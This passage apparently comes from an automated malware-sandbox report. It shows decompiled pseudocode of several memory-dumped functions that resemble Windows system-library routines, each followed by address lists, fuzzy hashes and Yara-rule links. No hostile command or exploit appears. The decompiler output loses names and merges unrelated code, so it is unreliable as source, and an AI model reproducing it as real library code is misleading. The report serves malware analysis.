					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                        0x048c23b0
                                                        0x048c23b6
                                                        0x048c2409
                                                        0x048c2415
                                                        0x04905ae9
                                                        0x00000000
                                                        0x048c241b
                                                        0x048c241b
                                                        0x048c241d
                                                        0x048c2427
                                                        0x048c242e
                                                        0x048c2430
                                                        0x048c2430
                                                        0x048c23b8
                                                        0x048c23b8
                                                        0x048c23b8
                                                        0x048c23bf
                                                        0x048c23fc
                                                        0x048c23fc
                                                        0x048c23c1
                                                        0x048c23c3
                                                        0x048c23d0
                                                        0x048c23d8
                                                        0x048c23d8
                                                        0x048c23dc
                                                        0x048c23de
                                                        0x048c23e1
                                                        0x048c23e1
                                                        0x048c23ec

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 23ede5da874a58c9c419d06ded9e7ce2a6f02e98210d8777a0f290ab63873a55
                                                        • Instruction ID: 4e3442597fbb6f06c8301cac36c1520268c959c9cef5129d2f16dbcb3c549345
                                                        • Opcode Fuzzy Hash: 23ede5da874a58c9c419d06ded9e7ce2a6f02e98210d8777a0f290ab63873a55
                                                        • Instruction Fuzzy Hash: 2E11E931B443006BF720BA3D9C90B156789EB50768F544F6DE702E72D0D5B4F84596A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D37F5, Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E048D37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E048B2280(_t6, 0x4988550);
				}
				_t29 = E048D387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E048AFFB0(0x4988550, _t27, 0x4988550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                        0x048d37fa
                                                        0x048d37fc
                                                        0x048d3805
                                                        0x048d3808
                                                        0x048d3808
                                                        0x048d3814
                                                        0x048d3818
                                                        0x048d3846
                                                        0x048d3848
                                                        0x048d384b
                                                        0x048d384b
                                                        0x048d3852
                                                        0x00000000
                                                        0x048d3854
                                                        0x048d3856
                                                        0x00000000
                                                        0x00000000
                                                        0x048d3863
                                                        0x00000000
                                                        0x048d3863
                                                        0x048d381a
                                                        0x048d381a
                                                        0x048d381f
                                                        0x048d386e
                                                        0x048d386e
                                                        0x048d3871
                                                        0x048d3873
                                                        0x048d3873
                                                        0x048d3868
                                                        0x00000000
                                                        0x048d3868
                                                        0x048d3821
                                                        0x048d3826
                                                        0x00000000
                                                        0x00000000
                                                        0x048d3828
                                                        0x048d382a
                                                        0x048d3841
                                                        0x00000000
                                                        0x048d3841

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ffa1e6c5981a190fdf265a9180227ffbb492cb1c85cbdc105ffb58cd3b246ca7
                                                        • Instruction ID: 42ff9cf53ce82ebcf73db12c53238e183f975b501d5a79c1b64cddf6f8ec1290
                                                        • Opcode Fuzzy Hash: ffa1e6c5981a190fdf265a9180227ffbb492cb1c85cbdc105ffb58cd3b246ca7
                                                        • Instruction Fuzzy Hash: AD0104B2A036109BD3278B1D9900E26BBA6DF81B60B154A7DED45CB300DB30E800D7D2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489C962, Relevance: .1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 42%
                                                        			E0489C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x498d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E048AEEF0(0x49870a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0491F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E048AEB70(_t29, 0x49870a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E048DB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0491F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x49870c0; // 0x0
					while(_t38 != 0x49870c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x498b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                        0x0489c96a
                                                        0x0489c974
                                                        0x0489c988
                                                        0x0489c98a
                                                        0x04907c9d
                                                        0x04907c9f
                                                        0x04907ca4
                                                        0x04907cae
                                                        0x04907cf0
                                                        0x04907cf5
                                                        0x04907cfa
                                                        0x0489c992
                                                        0x0489c996
                                                        0x0489c997
                                                        0x0489c998
                                                        0x0489c9a3
                                                        0x0489c9a3
                                                        0x04907cb0
                                                        0x04907cb7
                                                        0x04907cbb
                                                        0x00000000
                                                        0x00000000
                                                        0x04907cbd
                                                        0x04907ce8
                                                        0x04907cc5
                                                        0x04907cc8
                                                        0x04907cca
                                                        0x04907cd0
                                                        0x04907cd6
                                                        0x04907cde
                                                        0x04907ce4
                                                        0x04907ce4
                                                        0x04907cd0
                                                        0x00000000
                                                        0x04907ce8
                                                        0x0489c990
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e7f07937e0556d0e995f87ca19b3cb21960f7e93eb3b80498772575e02e5862b
                                                        • Instruction ID: 9f04ac76f8a0268ca1bccbb6597e9e6d23e47cc55cf3d63b98f36884296f0d69
                                                        • Opcode Fuzzy Hash: e7f07937e0556d0e995f87ca19b3cb21960f7e93eb3b80498772575e02e5862b
                                                        • Instruction Fuzzy Hash: 1611C23170461A9FD710AFACDC85A2AB7E5FBC4624B200A7DE84183691DB60FC14C7D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C002D, Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048C002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E048B7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E048B7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E048B7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E048B7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                        0x048c0032
                                                        0x048c0037
                                                        0x048c0043
                                                        0x04904b3a
                                                        0x048c0049
                                                        0x048c0049
                                                        0x048c0049
                                                        0x048c004e
                                                        0x048c0053
                                                        0x04904b48
                                                        0x04904b5a
                                                        0x04904b4a
                                                        0x04904b53
                                                        0x04904b53
                                                        0x04904b5f
                                                        0x00000000
                                                        0x04904b61
                                                        0x00000000
                                                        0x04904b61
                                                        0x048c0059
                                                        0x048c0059
                                                        0x048c0060
                                                        0x04904b6f
                                                        0x04904b6f
                                                        0x048c0069
                                                        0x04904b83
                                                        0x00000000
                                                        0x00000000
                                                        0x04904b90
                                                        0x04904b9b
                                                        0x04904b9b
                                                        0x04904ba4
                                                        0x00000000
                                                        0x00000000
                                                        0x04904baa
                                                        0x00000000
                                                        0x048c006f
                                                        0x048c006f
                                                        0x00000000
                                                        0x048c006f
                                                        0x048c0069

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                        • Instruction ID: b5d2610638ffe370880524e2ad7f65e8240de47af4a4c6be065c3d07735c5c79
                                                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                        • Instruction Fuzzy Hash: AE11E5316026C0CFE7229B68C944B393798AF4179CF0A09B5DE04CB7D2E338F841C651
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A766D, Relevance: .1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E048A766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E048CF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E048CF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L048B4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                        0x048a7672
                                                        0x048a767f
                                                        0x048a7689
                                                        0x048a76de
                                                        0x048a76de
                                                        0x048a768b
                                                        0x048a7691
                                                        0x048a7693
                                                        0x048a7697
                                                        0x00000000
                                                        0x048a7699
                                                        0x048a76a8
                                                        0x00000000
                                                        0x048a76aa
                                                        0x048a76ad
                                                        0x048a76b1
                                                        0x00000000
                                                        0x048a76b3
                                                        0x048a76b3
                                                        0x048a76b5
                                                        0x048a76ba
                                                        0x048a76bc
                                                        0x048a76bc
                                                        0x048a76c0
                                                        0x00000000
                                                        0x048a76c2
                                                        0x048a76ce
                                                        0x048a76ce
                                                        0x048a76c0
                                                        0x048a76b1
                                                        0x048a76a8
                                                        0x048a7697
                                                        0x048a76d9

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                        • Instruction ID: cbfbfa2894779ec696ae6621b782211eb0e78a17301259b121195283476c62ff
                                                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                        • Instruction Fuzzy Hash: 92018833710519AFE720AE6ECC41F5B77ADEB84760F180A34BA08CB251DAB0ED1197A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0492C450, Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 46%
                                                        			E0492C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E048D9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E048D95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E048D95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E048D95D0();
				return L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                        0x0492c458
                                                        0x0492c45d
                                                        0x0492c466
                                                        0x0492c468
                                                        0x0492c469
                                                        0x0492c46a
                                                        0x0492c46b
                                                        0x0492c46e
                                                        0x0492c46f
                                                        0x0492c471
                                                        0x0492c476
                                                        0x0492c476
                                                        0x0492c47c
                                                        0x0492c47e
                                                        0x0492c480
                                                        0x0492c480
                                                        0x0492c483
                                                        0x0492c484
                                                        0x0492c486
                                                        0x0492c488
                                                        0x0492c48f
                                                        0x0492c491
                                                        0x0492c493
                                                        0x0492c493
                                                        0x0492c48f
                                                        0x0492c498
                                                        0x0492c49e
                                                        0x0492c4ad
                                                        0x0492c4ad
                                                        0x0492c4b2
                                                        0x0492c4b4
                                                        0x0492c4cd

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                        • Instruction ID: 9c6f8bbb8f25c32d039adbf1991cd8af440321c16e3be666b9dc6557c9a321f3
                                                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                        • Instruction Fuzzy Hash: 75019671140915BFE711AF69CD80E67FB7DFF54354F004635F15486564C761BCA0C6A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04899080, Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E04899080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x49885ec;
				E048B2280(_t48, 0x49885ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E048AFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x498538c; // 0x771c6888
					if( *_t84 != 0x4985388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x496f6e8);
						E048ED0E8(0x49885ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E049688F5(_t80, _t85, 0x4985388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x49886c0; // 0x2607b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x49886b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E048B2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E049688F5(0x49885ec, _t85, 0x4985388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E048DAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x498b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x49884c0;
																			if(_t82 >=  *0x49884c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04969063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0489922A(_t99);
										_t64 = E048B7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04968B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x49886c0; // 0x2607b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x49886b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x49886bc;
													_t87 = 0x49886b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04899240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x49886c4;
												_t87 = 0x49886c0;
												L27:
												E048C9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E048ED130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4985388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x498538c = _t51;
						goto L6;
					}
				}
			}




















                                                        0x04899082
                                                        0x04899083
                                                        0x04899084
                                                        0x04899085
                                                        0x04899087
                                                        0x04899096
                                                        0x04899098
                                                        0x04899098
                                                        0x0489909e
                                                        0x048990a8
                                                        0x048990e7
                                                        0x048990e7
                                                        0x048990aa
                                                        0x048990b0
                                                        0x048990b7
                                                        0x048990bd
                                                        0x048990dd
                                                        0x048990e6
                                                        0x048990bf
                                                        0x048990bf
                                                        0x048990c7
                                                        0x048990cf
                                                        0x048990f1
                                                        0x048990f2
                                                        0x048990f4
                                                        0x048990f5
                                                        0x048990f6
                                                        0x048990f7
                                                        0x048990f8
                                                        0x048990f9
                                                        0x048990fa
                                                        0x048990fb
                                                        0x048990fc
                                                        0x048990fd
                                                        0x048990fe
                                                        0x048990ff
                                                        0x04899100
                                                        0x04899102
                                                        0x04899107
                                                        0x0489910c
                                                        0x04899110
                                                        0x04899113
                                                        0x04899115
                                                        0x04899136
                                                        0x0489913f
                                                        0x04899143
                                                        0x048f37e4
                                                        0x048f37e4
                                                        0x04899117
                                                        0x04899117
                                                        0x0489911d
                                                        0x00000000
                                                        0x0489911f
                                                        0x0489911f
                                                        0x04899125
                                                        0x00000000
                                                        0x04899127
                                                        0x0489912d
                                                        0x04899130
                                                        0x04899134
                                                        0x04899158
                                                        0x0489915d
                                                        0x04899161
                                                        0x04899168
                                                        0x048f3715
                                                        0x0489916e
                                                        0x0489916e
                                                        0x04899175
                                                        0x04899177
                                                        0x0489917e
                                                        0x0489917f
                                                        0x04899182
                                                        0x04899182
                                                        0x04899187
                                                        0x04899187
                                                        0x0489918a
                                                        0x0489918d
                                                        0x0489918f
                                                        0x04899192
                                                        0x04899195
                                                        0x04899198
                                                        0x04899198
                                                        0x04899198
                                                        0x0489919a
                                                        0x00000000
                                                        0x00000000
                                                        0x048f371f
                                                        0x048f3721
                                                        0x048f3727
                                                        0x048f372f
                                                        0x048f3733
                                                        0x048f3735
                                                        0x048f3738
                                                        0x048f373b
                                                        0x048f373d
                                                        0x048f3740
                                                        0x00000000
                                                        0x048f3746
                                                        0x048f3746
                                                        0x048f3749
                                                        0x00000000
                                                        0x048f374f
                                                        0x048f374f
                                                        0x048f3751
                                                        0x048f3757
                                                        0x048f3759
                                                        0x048f375c
                                                        0x048f375c
                                                        0x048f375e
                                                        0x048f375e
                                                        0x048f3761
                                                        0x048f3764
                                                        0x00000000
                                                        0x00000000
                                                        0x048f3766
                                                        0x048f3768
                                                        0x048f37a3
                                                        0x048f37a3
                                                        0x048f37a5
                                                        0x048f37a7
                                                        0x048f37ad
                                                        0x048f37b0
                                                        0x048f37b2
                                                        0x048f37bc
                                                        0x048f37c2
                                                        0x048f37c2
                                                        0x048f37b2
                                                        0x04899187
                                                        0x04899187
                                                        0x0489918a
                                                        0x0489918d
                                                        0x0489918f
                                                        0x04899192
                                                        0x04899195
                                                        0x00000000
                                                        0x04899195
                                                        0x00000000
                                                        0x048f376a
                                                        0x048f376a
                                                        0x048f376a
                                                        0x048f376c
                                                        0x048f376c
                                                        0x048f376f
                                                        0x048f3775
                                                        0x00000000
                                                        0x00000000
                                                        0x048f3777
                                                        0x048f3779
                                                        0x048f3782
                                                        0x048f3787
                                                        0x048f3789
                                                        0x048f3790
                                                        0x048f3790
                                                        0x048f378b
                                                        0x048f378b
                                                        0x048f378b
                                                        0x048f3792
                                                        0x048f3795
                                                        0x00000000
                                                        0x048f3795
                                                        0x00000000
                                                        0x048f3779
                                                        0x048f3798
                                                        0x00000000
                                                        0x048f3798
                                                        0x00000000
                                                        0x048f3768
                                                        0x048f379b
                                                        0x048f379b
                                                        0x048f3751
                                                        0x048f3749
                                                        0x00000000
                                                        0x048f3740
                                                        0x048991a0
                                                        0x048991a3
                                                        0x048991a9
                                                        0x048991b0
                                                        0x00000000
                                                        0x048991b0
                                                        0x04899187
                                                        0x048991b4
                                                        0x048991b4
                                                        0x048991bb
                                                        0x048991c0
                                                        0x048991c5
                                                        0x048991c7
                                                        0x048f37da
                                                        0x048991cd
                                                        0x048991cd
                                                        0x048991cd
                                                        0x048991d2
                                                        0x048991d5
                                                        0x04899239
                                                        0x04899239
                                                        0x048991d7
                                                        0x048991db
                                                        0x048991e1
                                                        0x048991e7
                                                        0x048991fd
                                                        0x04899203
                                                        0x0489921e
                                                        0x04899223
                                                        0x00000000
                                                        0x04899205
                                                        0x04899205
                                                        0x04899208
                                                        0x0489920c
                                                        0x04899214
                                                        0x04899214
                                                        0x0489920c
                                                        0x048991e9
                                                        0x048991e9
                                                        0x048991ee
                                                        0x048991f3
                                                        0x048991f3
                                                        0x048991f3
                                                        0x048991e7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04899134
                                                        0x04899125
                                                        0x0489911d
                                                        0x0489914e
                                                        0x048990d1
                                                        0x048990d1
                                                        0x048990d3
                                                        0x048990d6
                                                        0x048990d8
                                                        0x00000000
                                                        0x048990d8
                                                        0x048990cf

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b38358c6ca57868ae4daf93ac10d74a2bd134b803d49a58deaefdc1721bc752d
                                                        • Instruction ID: ca84310686b0d7b6302c11c3efc15c179f216f1384232be5236bb4633196df09
                                                        • Opcode Fuzzy Hash: b38358c6ca57868ae4daf93ac10d74a2bd134b803d49a58deaefdc1721bc752d
                                                        • Instruction Fuzzy Hash: 1101D1B2601A04EFE714AF0CD840B11BBE9EB41324F2A4A7AE511DB791C2B4EC41CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

